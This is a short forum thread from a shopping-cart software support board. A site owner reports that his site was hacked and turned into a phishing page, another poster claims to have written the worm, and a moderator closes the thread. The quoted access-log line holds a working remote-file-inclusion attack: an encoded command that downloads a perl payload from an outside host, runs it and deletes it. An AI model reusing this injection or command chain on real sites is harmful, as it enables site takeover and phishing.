Security Error pointed out

[Guest Ian MacMillan]

Got this from my hosting company today, I was using CC3 3.09 at the time, Now up to .10

Dear Ian MacMillan, (Customer ID: 6637673)

It has come to our attention that your web space has been hacked and used to setup a phishing site:

.ibank.barclays.co.uk/

This folder permissions have been changed to 000 so that you can delete the necessary files in the web space. Please remove this folder and also update any and all scripts and/or applications running within your web space.

access.log.09.gz:63.247.77.98 - - [01/Mar/2006:16:47:16 -0500] "GET /includes/orderSuccess.inc.php?cmd=killall%20-9%20perl%3Bwget%20elx.vr0k.com.ar%2Felx.1%2

0-O%20%2Ftmp%2F.i%3Bperl%20%2Ftmp%2F.i%3Brm%20-f%20%2Ftmp%2F.i&glob=1&cart_order_id=1&glob[rootDir]=http%3A%2F%2Felx.vr0k.com.ar%2Fcmd.txt? HTTP/1.1" 200 160

www.rockinghamjunctionmodels.com "-" "-" "-"

--

The above was taken from your access logs. It shows that /includes/orderSuccess.inc.php was used to perpetrate the hack.

[Laico]

can you post the orderSuccess.inc.php file in the code tags?

[Guest vr0k]

lol... my first worm ;)

[Guest EverythingWeb]

Pardon me?

[Guest vr0k]

I developed an worm that crawl google for vulnerable host to inclusion.btw Ian MacMillan sorry for what happen to ur website, some kid found my script and setup that scam s**t.

[Guest EverythingWeb]

Riiight... I dont think we need this discussion here.

Thanks, but no thanks. Topic Closed.